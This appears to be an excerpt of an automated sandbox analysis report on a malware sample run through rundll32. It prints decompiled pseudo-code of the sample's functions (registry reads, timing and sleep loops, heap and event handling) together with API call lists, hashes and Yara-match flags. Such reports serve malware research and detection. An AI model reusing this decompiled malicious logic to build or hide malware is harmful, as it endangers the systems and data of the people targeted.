                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: fa615c5b29654b0ee727ceba56259ffb9a451ffee2af1ba7f5e8a825c946942a
                            • Instruction ID: 2e96833f8ec79f439c8652b986f08be4898a2acfe50c70d39246c1606b1bc7df
                            • Opcode Fuzzy Hash: fa615c5b29654b0ee727ceba56259ffb9a451ffee2af1ba7f5e8a825c946942a
                            • Instruction Fuzzy Hash: 4C310E75900249EFDB05CF98D8909EE7BB9FF58350B10942EF90697260D774AA81CFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A170D8 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 41%
                            			E04A170D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E04A154BB(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04A178BF(_t23);
						}
					}
					return _t38;
				}
				_t26 = E04A13695(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4a1a34c, 1, 0,  *0x4a1a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					FindCloseChangeNotification(_t40); // executed
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04A171B6(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04A13472(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04A13AC2(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04A1498E( &_v32, _t39);
					goto L13;
				}
			}














                            0x04a170d8
                            0x04a170e5
                            0x04a170eb
                            0x04a170ec
                            0x04a170ed
                            0x04a170ee
                            0x04a170ef
                            0x04a170f3
                            0x04a170fa
                            0x04a170ff
                            0x04a17103
                            0x04a1718b
                            0x04a1718b
                            0x04a1718e
                            0x04a17190
                            0x04a17198
                            0x04a1719e
                            0x04a171a1
                            0x04a171a1
                            0x04a1719e
                            0x04a171ac
                            0x04a171ac
                            0x04a1710f
                            0x04a17116
                            0x04a17118
                            0x04a17118
                            0x04a1712f
                            0x04a17133
                            0x04a17136
                            0x04a17141
                            0x04a17148
                            0x04a17148
                            0x04a17151
                            0x04a17155
                            0x04a17163
                            0x04a17157
                            0x04a17157
                            0x04a17158
                            0x04a17159
                            0x04a1715a
                            0x04a1715b
                            0x04a1715c
                            0x04a1715c
                            0x04a17168
                            0x04a1716b
                            0x04a1716f
                            0x04a17171
                            0x04a17171
                            0x04a17178
                            0x00000000
                            0x04a1717a
                            0x04a1717a
                            0x04a17187
                            0x00000000
                            0x04a17187

                            APIs
                            • CreateEventA.KERNEL32(04A1A34C,00000001,00000000,00000040,?,?,7620F710,00000000,7620F730), ref: 04A17129
                            • SetEvent.KERNEL32(00000000), ref: 04A17136
                            • Sleep.KERNEL32(00000BB8), ref: 04A17141
                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 04A17148
                              • Part of subcall function 04A171B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04A17168,?), ref: 04A171DC
                              • Part of subcall function 04A171B6: RegEnumKeyExA.KERNEL32(?,?,?,04A17168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04A17168), ref: 04A17223
                              • Part of subcall function 04A171B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,04A17168,?,04A17168,?,?,?,?,?,04A17168,?), ref: 04A17290
                              • Part of subcall function 04A171B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04A17168,?), ref: 04A172B8
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                            • String ID:
                            • API String ID: 780868161-0
                            • Opcode ID: 1b6b6ee73703d2fb9ee4ac067596721efdf777a1ae5c21dd054fb40f24bc1ad1
                            • Instruction ID: 1a086c440fb95c5f9d4aa7a201fd80fb64573cfde5e5cc2d3912cde101d27869
                            • Opcode Fuzzy Hash: 1b6b6ee73703d2fb9ee4ac067596721efdf777a1ae5c21dd054fb40f24bc1ad1
                            • Instruction Fuzzy Hash: 0121A476D01129ABEF20AFE4C984CEFB7BDEB48354B054425EA51A7130D734B945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A112CA Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A112CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E04A16D63(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E04A16C2C(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E04A16500(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                            0x04a112d6
                            0x04a112f9
                            0x04a11303
                            0x04a11309
                            0x04a1130d
                            0x04a11325
                            0x04a1132a
                            0x04a11372
                            0x04a1132c
                            0x04a11334
                            0x04a11338
                            0x04a1136f
                            0x04a1133a
                            0x04a1134c
                            0x04a11350
                            0x04a11366
                            0x04a11352
                            0x04a11355
                            0x04a11357
                            0x04a1135c
                            0x04a11361
                            0x04a11361
                            0x04a1135c
                            0x04a11350
                            0x04a11338
                            0x04a1137a
                            0x04a1137a
                            0x04a11381
                            0x04a11387
                            0x04a11387
                            0x04a112ef
                            0x04a112f3
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • RegOpenKeyW.ADVAPI32(80000002,05539E92,05539E92), ref: 04A11303
                            • RegQueryValueExW.KERNEL32(05539E92,?,00000000,80000002,00000000,00000000,?,04A13551,3D04A190,80000002,04A17168,00000000,04A17168,?,05539E92,80000002), ref: 04A11325
                            • RegQueryValueExW.ADVAPI32(05539E92,?,00000000,80000002,00000000,00000000,00000000,?,04A13551,3D04A190,80000002,04A17168,00000000,04A17168,?,05539E92), ref: 04A1134A
                            • RegCloseKey.KERNEL32(05539E92,?,04A13551,3D04A190,80000002,04A17168,00000000,04A17168,?,05539E92,80000002,00000000,?), ref: 04A1137A
                              • Part of subcall function 04A16500: SafeArrayDestroy.OLEAUT32(00000000), ref: 04A16588
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                            • String ID:
                            • API String ID: 486277218-0
                            • Opcode ID: eda5fc03513ce694b4a24f7ba63f5d62cd0a62f50148382bcb9a9a5dd923763f
                            • Instruction ID: 5cef806f5c77bec7b7ff97eae4bca2d83f204067d34be900dece3769c8bb71f6
                            • Opcode Fuzzy Hash: eda5fc03513ce694b4a24f7ba63f5d62cd0a62f50148382bcb9a9a5dd923763f
                            • Instruction Fuzzy Hash: 8421397250015EBFDF129F94DC84CEE7BA9FB08290B018426FE559A530D632ED60DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F79661 Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                            Download Yara Rule
                            APIs
                            • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,04F662DD,?,?,?,?), ref: 04F79686
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04F7969D
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04F662DD,?,?,?,?,?,?,00000000), ref: 04F796B8
                            • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,04F662DD,?,?,?,?), ref: 04F796D7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapQueryValue$AllocateFree
                            • String ID:
                            • API String ID: 4267586637-0
                            • Opcode ID: d3c44dc66a2a889bebb9f8041f77071bdfd1539f40d86ba601228a0dc8031eb3
                            • Instruction ID: b238c6ff206bcd035198e028af098a2797a495fc22ea31af16bdc151105a549f
                            • Opcode Fuzzy Hash: d3c44dc66a2a889bebb9f8041f77071bdfd1539f40d86ba601228a0dc8031eb3
                            • Instruction Fuzzy Hash: BF111FB690011CFFDB129F95DC84CEEBBBDEB89750F10415AF905A6210E2B56E41EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A14B89 Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 65%
                            			E04A14B89(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L04A183A6();
					_t34 = _t16 + _t13;
					_t18 = E04A15D2E(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                            0x04a14b8e
                            0x04a14b99
                            0x04a14b9a
                            0x04a14b9a
                            0x04a14ba6
                            0x04a14baf
                            0x04a14bb2
                            0x04a14bb6
                            0x04a14bb8
                            0x04a14bbd
                            0x04a14bbe
                            0x04a14bbf
                            0x04a14bc9
                            0x04a14bcc
                            0x04a14bd3
                            0x04a14bd7
                            0x04a14bde
                            0x04a14be4
                            0x04a14bee

                            APIs
                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,04A11D14,?,?), ref: 04A14B9A
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04A11D14,?,?), ref: 04A14BA6
                            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04A14BBF
                              • Part of subcall function 04A15D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 04A15D8D
                            • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04A11D14,?,?), ref: 04A14BDE
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                            • String ID:
                            • API String ID: 1610602887-0
                            • Opcode ID: 79d9a76a0aa66ac51e72b2a3d66e00cc1bb1dc8dd54149b8cd491d8f41aeb59f
                            • Instruction ID: 053b319af1249c97d477cd2d09ce3da00f3b0912709f6c879d5aaebfeb1cbc12
                            • Opcode Fuzzy Hash: 79d9a76a0aa66ac51e72b2a3d66e00cc1bb1dc8dd54149b8cd491d8f41aeb59f
                            • Instruction Fuzzy Hash: 58F0A4B7A002087BE7149BA4CC1DFDF76BDDBC4355F050124F601E7240E678AA01C650
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F671B4 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671D3
                            • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671DE
                            • _wcsupr.NTDLL ref: 04F671EB
                            • lstrlenW.KERNEL32(00000000), ref: 04F671F3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                            • String ID:
                            • API String ID: 2533608484-0
                            • Opcode ID: e03ff5936238a4162676a99153f225249d7c3190eba9a17c8fbc8c59266819a2
                            • Instruction ID: 1be3c36c2942f559ad37f16032474d22a275970cedcb4dda940a11ddead3ee88
                            • Opcode Fuzzy Hash: e03ff5936238a4162676a99153f225249d7c3190eba9a17c8fbc8c59266819a2
                            • Instruction Fuzzy Hash: C9F0E9326011152FA3127E75AC88E7F779CFF8179C710082DF606DA144DE68DC038AA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7C384 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F7C3A3
                              • Part of subcall function 04F68FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 04F68FBA
                              • Part of subcall function 04F68FAE: CloseHandle.KERNEL32(?), ref: 04F68FC8
                              • Part of subcall function 04F68FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F68FE4
                            • FindCloseChangeNotification.KERNEL32(?), ref: 04F7C3B1
                            • InterlockedDecrement.KERNEL32(04F8A05C), ref: 04F7C3C0
                              • Part of subcall function 04F7E831: SetEvent.KERNEL32(000005BC,04F7C3DB), ref: 04F7E83B
                              • Part of subcall function 04F7E831: CloseHandle.KERNEL32(000005BC), ref: 04F7E850
                              • Part of subcall function 04F7E831: HeapDestroy.KERNELBASE(05F20000), ref: 04F7E860
                            • RtlExitUserThread.NTDLL(00000000), ref: 04F7C3DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$CriticalHandleSection$ChangeDecrementDestroyEnterEventExitFindHeapInterlockedLeaveMultipleNotificationObjectsThreadUserWait
                            • String ID:
                            • API String ID: 2993087875-0
                            • Opcode ID: 86a880ee0aa9570a50a93c1cb0be6e8dd066dc38127c0e69058cb5b1a09d4e6c
                            • Instruction ID: 4946ee2d8746ab9e5c744d6973e0ff6047371aa0ee0ca6198700816d65ec016f
                            • Opcode Fuzzy Hash: 86a880ee0aa9570a50a93c1cb0be6e8dd066dc38127c0e69058cb5b1a09d4e6c
                            • Instruction Fuzzy Hash: DAF04430940608BFE7116F68AC49E6D3B68FB41730B11021EF5159B1C0EA7CAD028B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1765B Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E04A1765B(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x4a1a3cc; // 0x55395b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4a1a3cc; // 0x55395b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x4a1a030) {
					HeapFree( *0x4a1a2d8, 0, _t8);
				}
				_t9 = E04A16E6D(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x4a1a3cc; // 0x55395b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                            0x04a1765b
                            0x04a1765b
                            0x04a17664
                            0x04a17674
                            0x04a17674
                            0x04a17679
                            0x04a1767e
                            0x00000000
                            0x00000000
                            0x04a1766e
                            0x04a1766e
                            0x04a17680
                            0x04a17684
                            0x04a17696
                            0x04a17696
                            0x04a176a1
                            0x04a176a6
                            0x04a176a9
                            0x04a176ae
                            0x04a176b2
                            0x04a176b8

                            APIs
                            • RtlEnterCriticalSection.NTDLL(05539570), ref: 04A17664
                            • Sleep.KERNEL32(0000000A), ref: 04A1766E
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A17696
                            • RtlLeaveCriticalSection.NTDLL(05539570), ref: 04A176B2
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 30ba9e2c3d63bf0b9babbb8d7f3acceea50c6880b81dd0f68d0ee893ffe3f021
                            • Instruction ID: a79251dc1e937957e990bf4d36c40cb7bc3388eaf69305b7c22f57a5a7f3e251
                            • Opcode Fuzzy Hash: 30ba9e2c3d63bf0b9babbb8d7f3acceea50c6880b81dd0f68d0ee893ffe3f021
                            • Instruction Fuzzy Hash: A5F058B46012419FF720AF68DC48F1A3BB8EF20B80B005405F515C62B5C228FC42DB19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7A451 Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F7A477
                            • memcpy.NTDLL ref: 04F7A49F
                              • Part of subcall function 04F77950: NtAllocateVirtualMemory.NTDLL(04F7EB0F,00000000,00000000,04F7EB0F,00003000,00000040), ref: 04F77981
                              • Part of subcall function 04F77950: RtlNtStatusToDosError.NTDLL(00000000), ref: 04F77988
                              • Part of subcall function 04F77950: SetLastError.KERNEL32(00000000), ref: 04F7798F
                            • GetLastError.KERNEL32(00000010,00000218,04F8386D,00000100,?,00000318,00000008), ref: 04F7A4B6
                            • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04F8386D,00000100), ref: 04F7A599
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                            • String ID:
                            • API String ID: 685050087-0
                            • Opcode ID: 77a813ba23b3ae29494af356c58a122e8fdd8423be2d8e9783863003ac8839ce
                            • Instruction ID: 5db175f42c8af301b7cc02e7903399d5683b43b131e39b352abf297fdb42cffa
                            • Opcode Fuzzy Hash: 77a813ba23b3ae29494af356c58a122e8fdd8423be2d8e9783863003ac8839ce
                            • Instruction Fuzzy Hash: 7A4193B2904705AFD721DF24DC41FABB7E9FB48310F00892EF999C6290E735E5158B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1216C Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A1216C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04A13695(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4a1a348; // 0xb1d5a8
				_t4 = _t24 + 0x4a1be58; // 0x5539400
				_t5 = _t24 + 0x4a1be00; // 0x4f0053
				_t26 = E04A1155C( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4a1a348; // 0xb1d5a8
						_t11 = _t32 + 0x4a1be4c; // 0x55393f4
						_t48 = _t11;
						_t12 = _t32 + 0x4a1be00; // 0x4f0053
						_t52 = E04A128C4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x4a1a348; // 0xb1d5a8
							_t13 = _t35 + 0x4a1ba51; // 0x30314549
							_t37 = E04A141FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x4a1a2fc - 6;
								if( *0x4a1a2fc <= 6) {
									_t42 =  *0x4a1a348; // 0xb1d5a8
									_t15 = _t42 + 0x4a1bde2; // 0x52384549
									E04A141FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x4a1a348; // 0xb1d5a8
							_t17 = _t38 + 0x4a1be90; // 0x5539438
							_t18 = _t38 + 0x4a1be68; // 0x680043
							_t45 = E04A174B6(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x4a1a2d8, 0, _t52);
						}
					}
					HeapFree( *0x4a1a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04A13AC2(_t54);
				}
				return _t45;
			}



















                            0x04a1216c
                            0x04a1217c
                            0x04a1217f
                            0x04a12186
                            0x04a12188
                            0x04a12188
                            0x04a1218b
                            0x04a12190
                            0x04a12197
                            0x04a121a4
                            0x04a121a9
                            0x04a121ad
                            0x04a121bb
                            0x04a121c9
                            0x04a121cd
                            0x04a1225e
                            0x04a1225e
                            0x04a121d3
                            0x04a121d3
                            0x04a121d8
                            0x04a121d8
                            0x04a121df
                            0x04a121eb
                            0x04a121ed
                            0x04a121ef
                            0x04a121f1
                            0x04a121f8
                            0x04a12203
                            0x04a1220a
                            0x04a1220c
                            0x04a12213
                            0x04a12215
                            0x04a1221c
                            0x04a12227
                            0x04a12227
                            0x04a12213
                            0x04a1222c
                            0x04a12231
                            0x04a12238
                            0x04a12256
                            0x04a12258
                            0x04a12258
                            0x04a121ef
                            0x04a1226a
                            0x04a1226a
                            0x04a1226c
                            0x04a12271
                            0x04a12273
                            0x04a12273
                            0x04a1227e

                            APIs
                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05539400,00000000,?,7620F710,00000000,7620F730), ref: 04A121BB
                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05539438,?,00000000,30314549,00000014,004F0053,055393F4), ref: 04A12258
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04A166BE), ref: 04A1226A
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: d6453ee81524c057be6986ef1aab7b737ce0094080a666e043f685a434e2da60
                            • Instruction ID: 7be27148074215f3c82e8748110a690c6b6b472efcfb41d9b91b62c846eccc41
                            • Opcode Fuzzy Hash: d6453ee81524c057be6986ef1aab7b737ce0094080a666e043f685a434e2da60
                            • Instruction Fuzzy Hash: F831AB36A01208BFEB12DF94DC84FDE3BBDEB48704F0440A5A604AB071D2B1BE05DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A143EB Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E04A143EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x4a1a348; // 0xb1d5a8
				_t2 = _t22 + 0x4a1b67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x4a1a2ec >= 5) {
					_t30 = E04A156C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x4a1a2ec =  *0x4a1a2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E04A1708D(_t50, _t49); // executed
					_t34 = E04A12B23(_t49, _t50); // executed
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x4a1a2ec < 5) {
							 *0x4a1a2ec =  *0x4a1a2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E04A1561E();
					HeapFree( *0x4a1a2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x4a1a3e0; // 0x5539b78
				if(RtlAllocateHeap( *0x4a1a2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E04A1300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}















